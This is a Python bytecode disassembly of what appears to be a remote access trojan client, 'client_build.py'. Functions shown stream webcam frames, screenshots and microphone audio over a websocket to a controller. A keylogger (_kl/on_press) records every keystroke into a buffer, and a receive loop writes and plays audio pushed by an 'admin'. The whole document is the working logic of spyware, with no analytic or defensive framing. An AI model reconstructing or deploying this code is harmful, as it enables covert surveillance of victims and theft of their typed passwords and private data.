                 LOAD_FAST                7 (cmd)
                 CALL                     1
                 JUMP_FORWARD             1 (to L212)
       L211:     LOAD_CONST              77 ('?')
       L212:     FORMAT_SIMPLE
                 LOAD_CONST              78 (' err: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP
       L213:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 EXTENDED_ARG             1
                 JUMP_BACKWARD_NO_INTERRUPT 319 (to L134)

  --   L214:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 715   L215:     RERAISE                  0

  --   L216:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L217:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                 RERAISE                  1
ExceptionTable:
  L1 to L5 -> L217 [0] lasti
  L5 to L6 -> L135 [2]
  L6 to L8 -> L217 [0] lasti
  L9 to L10 -> L146 [0]
  L10 to L11 -> L137 [1] lasti
  L11 to L12 -> L146 [0]
  L13 to L14 -> L141 [0]
  L14 to L16 -> L217 [0] lasti
  L17 to L18 -> L209 [0]
  L18 to L19 -> L217 [0] lasti
  L19 to L20 -> L209 [0]
  L20 to L21 -> L217 [0] lasti
  L21 to L22 -> L209 [0]
  L22 to L23 -> L217 [0] lasti
  L23 to L25 -> L209 [0]
  L25 to L26 -> L152 [2]
  L26 to L28 -> L209 [0]
  L28 to L29 -> L217 [0] lasti
  L29 to L31 -> L209 [0]
  L31 to L32 -> L154 [3]
  L32 to L34 -> L209 [0]
  L34 to L36 -> L158 [1] lasti
  L36 to L38 -> L209 [0]
  L38 to L39 -> L156 [2]
  L39 to L42 -> L209 [0]
  L42 to L43 -> L217 [0] lasti
  L43 to L45 -> L209 [0]
  L45 to L46 -> L167 [2]
  L46 to L48 -> L209 [0]
  L48 to L49 -> L217 [0] lasti
  L49 to L50 -> L209 [0]
  L50 to L51 -> L217 [0] lasti
  L51 to L52 -> L209 [0]
  L52 to L53 -> L217 [0] lasti
  L53 to L55 -> L209 [0]
  L56 to L59 -> L209 [0]
  L59 to L60 -> L169 [2]
  L60 to L62 -> L209 [0]
  L62 to L63 -> L217 [0] lasti
  L63 to L65 -> L209 [0]
  L66 to L69 -> L171 [1]
  L69 to L72 -> L209 [0]
  L72 to L73 -> L174 [2]
  L73 to L75 -> L209 [0]
  L75 to L76 -> L217 [0] lasti
  L76 to L77 -> L209 [0]
  L78 to L79 -> L185 [0]
  L79 to L80 -> L176 [1] lasti
  L80 to L81 -> L185 [0]
  L82 to L83 -> L180 [0]
  L83 to L85 -> L217 [0] lasti
  L85 to L86 -> L209 [0]
  L86 to L87 -> L217 [0] lasti
  L87 to L88 -> L209 [0]
  L88 to L90 -> L194 [1] lasti
  L90 to L91 -> L192 [3]
  L91 to L93 -> L194 [1] lasti
  L93 to L94 -> L209 [0]
  L94 to L95 -> L217 [0] lasti
  L95 to L96 -> L209 [0]
  L96 to L97 -> L217 [0] lasti
  L97 to L98 -> L209 [0]
  L98 to L99 -> L217 [0] lasti
  L99 to L101 -> L209 [0]
  L101 to L102 -> L199 [2]
  L102 to L104 -> L209 [0]
  L104 to L105 -> L217 [0] lasti
  L105 to L107 -> L209 [0]
  L107 to L108 -> L201 [2]
  L108 to L110 -> L209 [0]
  L110 to L111 -> L217 [0] lasti
  L111 to L113 -> L209 [0]
  L113 to L114 -> L203 [2]
  L114 to L116 -> L209 [0]
  L116 to L117 -> L217 [0] lasti
  L117 to L118 -> L209 [0]
  L118 to L119 -> L217 [0] lasti
  L119 to L121 -> L209 [0]
  L121 to L122 -> L205 [2]
  L122 to L124 -> L209 [0]
  L124 to L125 -> L217 [0] lasti
  L125 to L127 -> L209 [0]
  L127 to L128 -> L207 [2]
  L128 to L130 -> L209 [0]
  L130 to L131 -> L217 [0] lasti
  L131 to L132 -> L209 [0]
  L132 to L133 -> L217 [0] lasti
  L133 to L134 -> L209 [0]
  L134 to L136 -> L217 [0] lasti
  L137 to L139 -> L140 [3] lasti
  L139 to L141 -> L146 [0]
  L141 to L142 -> L145 [1] lasti
  L142 to L143 -> L146 [0]
  L143 to L144 -> L217 [0] lasti
  L144 to L145 -> L145 [1] lasti
  L145 to L146 -> L146 [0]
  L146 to L147 -> L151 [1] lasti
  L147 to L148 -> L149 [1] lasti
  L148 to L149 -> L217 [0] lasti
  L149 to L151 -> L151 [1] lasti
  L151 to L152 -> L217 [0] lasti
  L152 to L153 -> L209 [0]
  L154 to L155 -> L209 [0]
  L156 to L157 -> L209 [0]
  L158 to L160 -> L166 [3] lasti
  L160 to L161 -> L162 [6]
  L161 to L165 -> L166 [3] lasti
  L165 to L168 -> L209 [0]
  L169 to L170 -> L209 [0]
  L171 to L172 -> L173 [2] lasti
  L172 to L175 -> L209 [0]
  L176 to L178 -> L179 [3] lasti
  L178 to L180 -> L185 [0]
  L180 to L181 -> L184 [1] lasti
  L181 to L182 -> L185 [0]
  L182 to L183 -> L217 [0] lasti
  L183 to L184 -> L184 [1] lasti
  L184 to L185 -> L185 [0]
  L185 to L186 -> L191 [1] lasti
  L186 to L187 -> L189 [1] lasti
  L187 to L188 -> L209 [0]
  L188 to L189 -> L217 [0] lasti
  L189 to L191 -> L191 [1] lasti
  L191 to L192 -> L209 [0]
  L192 to L193 -> L194 [1] lasti
  L194 to L196 -> L198 [3] lasti
  L196 to L197 -> L209 [0]
  L197 to L198 -> L217 [0] lasti
  L198 to L200 -> L209 [0]
  L201 to L202 -> L209 [0]
  L203 to L204 -> L209 [0]
  L205 to L206 -> L209 [0]
  L207 to L208 -> L209 [0]
  L209 to L210 -> L216 [1] lasti
  L210 to L213 -> L214 [1] lasti
  L213 to L214 -> L217 [0] lasti
  L214 to L216 -> L216 [1] lasti
  L216 to L217 -> L217 [0] lasti

Disassembly of <code object cam_stream_loop at 0x0000023B2FBD0000, file "client_build.py", line 718>:
  --            COPY_FREE_VARS           1

 718            RETURN_GENERATOR
                POP_TOP
        L1:     RESUME                   0

 719            NOP

 720    L2:     NOP

 721    L3:     LOAD_GLOBAL              0 (_cam_stream_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE      251 (to L27)

 722            LOAD_GLOBAL              2 (_camera_lock)
                BEFORE_ASYNC_WITH
                GET_AWAITABLE            1
                LOAD_CONST               0 (None)
        L4:     SEND                     3 (to L7)
        L5:     YIELD_VALUE              1
        L6:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L4)
        L7:     END_SEND
        L8:     POP_TOP

 723            LOAD_GLOBAL              5 (_open_camera + NULL)
                CALL                     0
                STORE_FAST               0 (cap)

 724            LOAD_FAST                0 (cap)
                POP_JUMP_IF_NONE        19 (to L9)

 725            LOAD_FAST                0 (cap)
                LOAD_ATTR                7 (read + NULL|self)
                CALL                     0
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   18 (ret, frame)
                JUMP_FORWARD             2 (to L10)

 727    L9:     LOAD_CONST               1 (False)
                STORE_FAST               1 (ret)

 722   L10:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L11:     SEND                     3 (to L14)
       L12:     YIELD_VALUE              1
       L13:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L11)
       L14:     END_SEND
                POP_TOP

 728   L15:     LOAD_FAST_CHECK          1 (ret)
                TO_BOOL
                POP_JUMP_IF_FALSE       80 (to L20)

 729            LOAD_CONST               2 (0)
                LOAD_CONST               0 (None)
                IMPORT_NAME              4 (cv2)
                STORE_FAST               3 (cv2)

 730            LOAD_FAST                3 (cv2)
                LOAD_ATTR               11 (imencode + NULL|self)
                LOAD_CONST               3 ('.jpg')
                LOAD_FAST_CHECK          2 (frame)
                LOAD_FAST                3 (cv2)
                LOAD_ATTR               12 (IMWRITE_JPEG_QUALITY)
                LOAD_CONST               4 (50)
                BUILD_LIST               2
                CALL                     3
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   69 (_, jpg)

 731            LOAD_DEREF               8 (cam_ws)
                LOAD_ATTR               15 (send + NULL|self)
                LOAD_CONST               5 (b'\x01')
                LOAD_FAST                5 (jpg)
                LOAD_ATTR               17 (tobytes + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L16:     SEND                     3 (to L19)
       L17:     YIELD_VALUE              1
       L18:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L16)
       L19:     END_SEND
                POP_TOP
                JUMP_FORWARD            21 (to L21)

 733   L20:     LOAD_GLOBAL             19 (_log + NULL)
                LOAD_CONST               6 ('Cam stream: failed to grab frame')
                CALL                     1
                POP_TOP

 734            LOAD_GLOBAL             21 (_close_camera + NULL)
                CALL                     0
                POP_TOP

 735   L21:     LOAD_GLOBAL             22 (_audio_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE       66 (to L26)
                LOAD_GLOBAL             24 (_audio_queue)
                TO_BOOL
                POP_JUMP_IF_FALSE       55 (to L26)

 736            LOAD_GLOBAL             24 (_audio_queue)
                LOAD_ATTR               27 (popleft + NULL|self)
                CALL                     0
                STORE_FAST               6 (audio_chunk)

 737            LOAD_FAST                6 (audio_chunk)
                TO_BOOL
                POP_JUMP_IF_FALSE       28 (to L26)

 738            LOAD_DEREF               8 (cam_ws)
                LOAD_ATTR               15 (send + NULL|self)
                LOAD_CONST               7 (b'\x02')
                LOAD_FAST                6 (audio_chunk)
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L22:     SEND                     3 (to L25)
       L23:     YIELD_VALUE              1
       L24:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L22)
       L25:     END_SEND
                POP_TOP

  --   L26:     JUMP_FORWARD            11 (to L29)

 740   L27:     LOAD_GLOBAL             21 (_close_camera + NULL)
                CALL                     0
                POP_TOP
       L28:     NOP

 743   L29:     LOAD_GLOBAL             30 (asyncio)
                LOAD_ATTR               32 (sleep)
                PUSH_NULL
                LOAD_CONST               9 (0.08)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L30:     SEND                     3 (to L33)
       L31:     YIELD_VALUE              1
       L32:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L30)
       L33:     END_SEND
                POP_TOP

 719            EXTENDED_ARG             1
                JUMP_BACKWARD          307 (to L2)

 722   L34:     CLEANUP_THROW
       L35:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 285 (to L7)
       L36:     CLEANUP_THROW
       L37:     JUMP_BACKWARD_NO_INTERRUPT 237 (to L14)
       L38:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L39:     SEND                     4 (to L43)
       L40:     YIELD_VALUE              1
       L41:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L39)
       L42:     CLEANUP_THROW
       L43:     END_SEND
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L44)
                RERAISE                  2
       L44:     POP_TOP
       L45:     POP_EXCEPT
                POP_TOP
                POP_TOP
                EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 259 (to L15)

  --   L46:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 731   L47:     CLEANUP_THROW
       L48:     JUMP_BACKWARD_NO_INTERRUPT 180 (to L19)

 738   L49:     CLEANUP_THROW
       L50:     JUMP_BACKWARD_NO_INTERRUPT 83 (to L25)

  --   L51:     PUSH_EXC_INFO

 741            LOAD_GLOBAL             28 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE       24 (to L55)
                STORE_FAST               7 (ex)

 742   L52:     LOAD_GLOBAL             19 (_log + NULL)
                LOAD_CONST               8 ('Cam stream error: ')
                LOAD_FAST                7 (ex)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP
       L53:     POP_EXCEPT
                LOAD_CONST               0 (None)
                STORE_FAST               7 (ex)
                DELETE_FAST              7 (ex)
                JUMP_BACKWARD_NO_INTERRUPT 98 (to L29)

  --   L54:     LOAD_CONST               0 (None)
                STORE_FAST               7 (ex)
                DELETE_FAST              7 (ex)
                RERAISE                  1

 741   L55:     RERAISE                  0

  --   L56:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 743   L57:     CLEANUP_THROW
       L58:     JUMP_BACKWARD_NO_INTERRUPT 80 (to L33)

  --   L59:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L59 [0] lasti
  L3 to L5 -> L51 [0]
  L5 to L6 -> L34 [3]
  L6 to L8 -> L51 [0]
  L8 to L10 -> L38 [1] lasti
  L10 to L12 -> L51 [0]
  L12 to L13 -> L36 [2]
  L13 to L17 -> L51 [0]
  L17 to L18 -> L47 [2]
  L18 to L23 -> L51 [0]
  L23 to L24 -> L49 [2]
  L24 to L26 -> L51 [0]
  L26 to L27 -> L59 [0] lasti
  L27 to L28 -> L51 [0]
  L28 to L31 -> L59 [0] lasti
  L31 to L32 -> L57 [2]
  L32 to L34 -> L59 [0] lasti
  L34 to L35 -> L51 [0]
  L36 to L37 -> L51 [0]
  L38 to L40 -> L46 [3] lasti
  L40 to L41 -> L42 [6]
  L41 to L45 -> L46 [3] lasti
  L45 to L48 -> L51 [0]
  L49 to L50 -> L51 [0]
  L51 to L52 -> L56 [1] lasti
  L52 to L53 -> L54 [1] lasti
  L53 to L54 -> L59 [0] lasti
  L54 to L56 -> L56 [1] lasti
  L56 to L58 -> L59 [0] lasti

Disassembly of <code object stream_loop at 0x0000023B2FA9C2F0, file "client_build.py", line 745>:
  --            COPY_FREE_VARS           1

 745            RETURN_GENERATOR
                POP_TOP
        L1:     RESUME                   0

 746            LOAD_CONST               0 (None)
                STORE_FAST               0 (cam)

 747            LOAD_GLOBAL              0 (mss)
                LOAD_ATTR                0 (mss)
                PUSH_NULL
                CALL                     0
                BEFORE_WITH
        L2:     STORE_FAST               1 (s)

 748            NOP

 749    L3:     NOP

 750    L4:     LOAD_GLOBAL              2 (_view_mode)
                LOAD_CONST               2 ('cam')
                COMPARE_OP              88 (bool(==))
                POP_JUMP_IF_FALSE      220 (to L11)

 751            LOAD_FAST                0 (cam)
                POP_JUMP_IF_NOT_NONE   105 (to L5)

 752            LOAD_CONST               3 (0)
                LOAD_CONST               0 (None)
                IMPORT_NAME              2 (cv2)
                STORE_FAST               2 (cv2)

 753            LOAD_FAST                2 (cv2)
                LOAD_ATTR                7 (VideoCapture + NULL|self)
                LOAD_CONST               3 (0)
                CALL                     1
                STORE_FAST               0 (cam)

 754            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               10 (CAP_PROP_FRAME_WIDTH)
                LOAD_CONST               4 (1280)
                CALL                     2
                POP_TOP

 755            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               12 (CAP_PROP_FRAME_HEIGHT)
                LOAD_CONST               5 (720)
                CALL                     2
                POP_TOP

 756            LOAD_FAST                0 (cam)
                LOAD_ATTR                9 (set + NULL|self)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               14 (CAP_PROP_FPS)
                LOAD_CONST               6 (30)
                CALL                     2
                POP_TOP

 757    L5:     LOAD_FAST                0 (cam)
                LOAD_ATTR               17 (read + NULL|self)
                CALL                     0
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   52 (ret, frame)

 758            LOAD_FAST                3 (ret)
                TO_BOOL
                POP_JUMP_IF_FALSE       86 (to L10)

 759            LOAD_FAST_CHECK          2 (cv2)
                LOAD_ATTR               19 (imencode + NULL|self)
                LOAD_CONST               7 ('.jpg')
                LOAD_FAST_LOAD_FAST     66 (frame, cv2)
                LOAD_ATTR               20 (IMWRITE_JPEG_QUALITY)
                LOAD_CONST               8 (80)
                LOAD_FAST                2 (cv2)
                LOAD_ATTR               22 (IMWRITE_JPEG_OPTIMIZE)
                LOAD_CONST               9 (1)
                BUILD_LIST               4
                CALL                     3
                UNPACK_SEQUENCE          2
                STORE_FAST_STORE_FAST   86 (_, jpg)

 760            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              10 (b'\x01')
                LOAD_FAST                6 (jpg)
                LOAD_ATTR               27 (tobytes + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
        L6:     SEND                     3 (to L9)
        L7:     YIELD_VALUE              1
        L8:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L6)
        L9:     END_SEND
                POP_TOP

  --   L10:     JUMP_FORWARD           165 (to L17)

 762   L11:     LOAD_FAST                0 (cam)
                POP_JUMP_IF_NONE        18 (to L12)

 763            LOAD_FAST                0 (cam)
                LOAD_ATTR               29 (release + NULL|self)
                CALL                     0
                POP_TOP

 764            LOAD_CONST               0 (None)
                STORE_FAST               0 (cam)

 765   L12:     LOAD_FAST                1 (s)
                LOAD_ATTR               31 (grab + NULL|self)
                LOAD_FAST                1 (s)
                LOAD_ATTR               32 (monitors)
                LOAD_CONST               3 (0)
                BINARY_SUBSCR
                CALL                     1
                STORE_FAST               7 (img)

 766            LOAD_GLOBAL             35 (BytesIO + NULL)
                CALL                     0
                STORE_FAST               8 (buf)

 767            LOAD_GLOBAL             36 (Image)
                LOAD_ATTR               38 (frombytes)
                PUSH_NULL
                LOAD_CONST              11 ('RGB')
                LOAD_FAST                7 (img)
                LOAD_ATTR               40 (size)
                LOAD_FAST                7 (img)
                LOAD_ATTR               42 (bgra)
                LOAD_CONST              12 ('raw')
                LOAD_CONST              13 ('BGRX')
                CALL                     5
                LOAD_ATTR               45 (save + NULL|self)
                LOAD_FAST                8 (buf)
                LOAD_CONST              14 ('JPEG')
                LOAD_CONST              15 (75)
                LOAD_CONST               1 (True)
                LOAD_CONST              16 (('format', 'quality', 'optimize'))
                CALL_KW                  4
                POP_TOP

 768            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              10 (b'\x01')
                LOAD_FAST                8 (buf)
                LOAD_ATTR               47 (getvalue + NULL|self)
                CALL                     0
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L13:     SEND                     3 (to L16)
       L14:     YIELD_VALUE              1
       L15:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L13)
       L16:     END_SEND
                POP_TOP

 770   L17:     LOAD_GLOBAL             48 (_audio_enabled)
                TO_BOOL
                POP_JUMP_IF_FALSE       66 (to L22)
                LOAD_GLOBAL             50 (_audio_queue)
                TO_BOOL
                POP_JUMP_IF_FALSE       55 (to L22)

 771            LOAD_GLOBAL             50 (_audio_queue)
                LOAD_ATTR               53 (popleft + NULL|self)
                CALL                     0
                STORE_FAST               9 (audio_chunk)

 772            LOAD_FAST                9 (audio_chunk)
                TO_BOOL
                POP_JUMP_IF_FALSE       28 (to L22)

 773            LOAD_DEREF              11 (ws)
                LOAD_ATTR               25 (send + NULL|self)
                LOAD_CONST              17 (b'\x02')
                LOAD_FAST                9 (audio_chunk)
                BINARY_OP                0 (+)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L18:     SEND                     3 (to L21)
       L19:     YIELD_VALUE              1
       L20:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L18)
       L21:     END_SEND
                POP_TOP

 776   L22:     LOAD_GLOBAL             58 (asyncio)
                LOAD_ATTR               60 (sleep)
                PUSH_NULL
                LOAD_CONST              19 (0.08)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L23:     SEND                     3 (to L26)
       L24:     YIELD_VALUE              1
       L25:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L23)
       L26:     END_SEND
                POP_TOP

 748            EXTENDED_ARG             1
                JUMP_BACKWARD          506 (to L3)

 760   L27:     CLEANUP_THROW
       L28:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 281 (to L9)

 768   L29:     CLEANUP_THROW
       L30:     JUMP_BACKWARD_NO_INTERRUPT 117 (to L16)

 773   L31:     CLEANUP_THROW
       L32:     JUMP_BACKWARD_NO_INTERRUPT 42 (to L21)

  --   L33:     PUSH_EXC_INFO

 774            LOAD_GLOBAL             54 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE       24 (to L37)
                STORE_FAST              10 (ex)

 775   L34:     LOAD_GLOBAL             57 (_log + NULL)
                LOAD_CONST              18 ('Stream loop error: ')
                LOAD_FAST               10 (ex)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP
       L35:     POP_EXCEPT
                LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                JUMP_BACKWARD_NO_INTERRUPT 69 (to L22)

  --   L36:     LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                RERAISE                  1

 774   L37:     RERAISE                  0

  --   L38:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 776   L39:     CLEANUP_THROW
       L40:     JUMP_BACKWARD_NO_INTERRUPT 51 (to L26)

 747   L41:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L42)
                RERAISE                  2
       L42:     POP_TOP
       L43:     POP_EXCEPT
                POP_TOP
                POP_TOP
                RETURN_CONST             0 (None)

  --   L44:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L45:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L45 [0] lasti
  L2 to L3 -> L41 [1] lasti
  L4 to L7 -> L33 [1]
  L7 to L8 -> L27 [3]
  L8 to L14 -> L33 [1]
  L14 to L15 -> L29 [3]
  L15 to L19 -> L33 [1]
  L19 to L20 -> L31 [3]
  L20 to L22 -> L33 [1]
  L22 to L24 -> L41 [1] lasti
  L24 to L25 -> L39 [3]
  L25 to L27 -> L41 [1] lasti
  L27 to L28 -> L33 [1]
  L29 to L30 -> L33 [1]
  L31 to L32 -> L33 [1]
  L33 to L34 -> L38 [2] lasti
  L34 to L35 -> L36 [2] lasti
  L35 to L36 -> L41 [1] lasti
  L36 to L38 -> L38 [2] lasti
  L38 to L40 -> L41 [1] lasti
  L41 to L43 -> L44 [3] lasti
  L43 to L45 -> L45 [0] lasti

  ### _kl ###
 550            RESUME                   0

 552            LOAD_CONST               1 (<code object on_press at 0x0000023B2EE74180, file "client_build.py", line 552>)
                MAKE_FUNCTION
                STORE_FAST               0 (on_press)

 559            NOP

 560    L1:     LOAD_GLOBAL              1 (KeyboardListener + NULL)
                LOAD_FAST                0 (on_press)
                LOAD_CONST               2 (('on_press',))
                CALL_KW                  1
                BEFORE_WITH
        L2:     STORE_FAST               1 (l)

 561            LOAD_FAST                1 (l)
                LOAD_ATTR                3 (join + NULL|self)
                CALL                     0
                POP_TOP

 560    L3:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                POP_TOP
        L4:     RETURN_CONST             0 (None)
        L5:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L6)
                RERAISE                  2
        L6:     POP_TOP
        L7:     POP_EXCEPT
                POP_TOP
                POP_TOP
        L8:     RETURN_CONST             0 (None)

  --    L9:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L10:     PUSH_EXC_INFO

 562            POP_TOP

 563   L11:     POP_EXCEPT
                RETURN_CONST             0 (None)

  --   L12:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L10 [0]
  L2 to L3 -> L5 [1] lasti
  L3 to L4 -> L10 [0]
  L5 to L7 -> L9 [3] lasti
  L7 to L8 -> L10 [0]
  L9 to L10 -> L10 [0]
  L10 to L11 -> L12 [1] lasti

Disassembly of <code object on_press at 0x0000023B2EE74180, file "client_build.py", line 552>:
 552           RESUME                   0

 554           LOAD_GLOBAL              0 (_keylog_on)
               TO_BOOL
               POP_JUMP_IF_FALSE       30 (to L3)

 555           NOP

 556   L1:     LOAD_GLOBAL              2 (_keybuf)
               LOAD_GLOBAL              5 (str + NULL)
               LOAD_FAST                0 (k)
               LOAD_ATTR                6 (char)
               CALL                     1
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L2:     RETURN_CONST             0 (None)

 554   L3:     RETURN_CONST             0 (None)

  --   L4:     PUSH_EXC_INFO

 557           POP_TOP

 558           LOAD_GLOBAL              2 (_keybuf)
               LOAD_CONST               1 ('[')
               LOAD_FAST                0 (k)
               FORMAT_SIMPLE
               LOAD_CONST               2 (']')
               BUILD_STRING             3
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L5:     POP_EXCEPT
               RETURN_CONST             0 (None)

  --   L6:     COPY                     3
               POP_EXCEPT
               RERAISE                  1
ExceptionTable:
  L1 to L2 -> L4 [0]
  L4 to L5 -> L6 [1] lasti

    ### on_press ###
 552           RESUME                   0

 554           LOAD_GLOBAL              0 (_keylog_on)
               TO_BOOL
               POP_JUMP_IF_FALSE       30 (to L3)

 555           NOP

 556   L1:     LOAD_GLOBAL              2 (_keybuf)
               LOAD_GLOBAL              5 (str + NULL)
               LOAD_FAST                0 (k)
               LOAD_ATTR                6 (char)
               CALL                     1
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L2:     RETURN_CONST             0 (None)

 554   L3:     RETURN_CONST             0 (None)

  --   L4:     PUSH_EXC_INFO

 557           POP_TOP

 558           LOAD_GLOBAL              2 (_keybuf)
               LOAD_CONST               1 ('[')
               LOAD_FAST                0 (k)
               FORMAT_SIMPLE
               LOAD_CONST               2 (']')
               BUILD_STRING             3
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L5:     POP_EXCEPT
               RETURN_CONST             0 (None)

  --   L6:     COPY                     3
               POP_EXCEPT
               RERAISE                  1
ExceptionTable:
  L1 to L2 -> L4 [0]
  L4 to L5 -> L6 [1] lasti

  ### recv_loop ###
  --             COPY_FREE_VARS           1

 586             RETURN_GENERATOR
                 POP_TOP
         L1:     RESUME                   0

 588     L2:     NOP

 589     L3:     LOAD_DEREF              28 (ws)
                 LOAD_ATTR                1 (recv + NULL|self)
                 CALL                     0
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
         L4:     SEND                     3 (to L7)
         L5:     YIELD_VALUE              1
         L6:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L4)
         L7:     END_SEND
                 STORE_FAST               0 (raw)

 590             LOAD_GLOBAL              3 (isinstance + NULL)
                 LOAD_FAST                0 (raw)
                 LOAD_GLOBAL              4 (bytes)
                 CALL                     2
                 TO_BOOL
                 POP_JUMP_IF_FALSE      211 (to L15)

 591             LOAD_GLOBAL              7 (len + NULL)
                 LOAD_FAST                0 (raw)
                 CALL                     1
                 LOAD_CONST               2 (1)
                 COMPARE_OP             148 (bool(>))
                 POP_JUMP_IF_FALSE      193 (to L14)
                 LOAD_FAST                0 (raw)
                 LOAD_CONST               3 (0)
                 BINARY_SUBSCR
                 LOAD_CONST               4 (3)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      184 (to L14)

 592     L8:     NOP

 593     L9:     LOAD_FAST                0 (raw)
                 LOAD_CONST               2 (1)
                 LOAD_CONST               0 (None)
                 BINARY_SLICE
                 STORE_FAST               1 (audio_data)

 594             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST               7 ('admin_audio_')
                 LOAD_GLOBAL             18 (uuid)
                 LOAD_ATTR               20 (uuid4)
                 PUSH_NULL
                 CALL                     0
                 LOAD_ATTR               22 (hex)
                 FORMAT_SIMPLE
                 LOAD_CONST               8 ('.wav')
                 BUILD_STRING             3
                 CALL                     2
                 STORE_FAST               2 (tmp)

 595             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST                2 (tmp)
                 LOAD_CONST               9 ('wb')
                 CALL                     2
                 BEFORE_WITH
        L10:     STORE_FAST               3 (f)

 596             LOAD_FAST                3 (f)
                 LOAD_ATTR               27 (write + NULL|self)
                 LOAD_FAST                1 (audio_data)
                 CALL                     1
                 POP_TOP

 595    L11:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP

 597    L12:     NOP

 598    L13:     LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             14 (winsound)
                 STORE_FAST               4 (winsound)

 599             LOAD_FAST                4 (winsound)
                 LOAD_ATTR               31 (PlaySound + NULL|self)
                 LOAD_FAST_LOAD_FAST     36 (tmp, winsound)
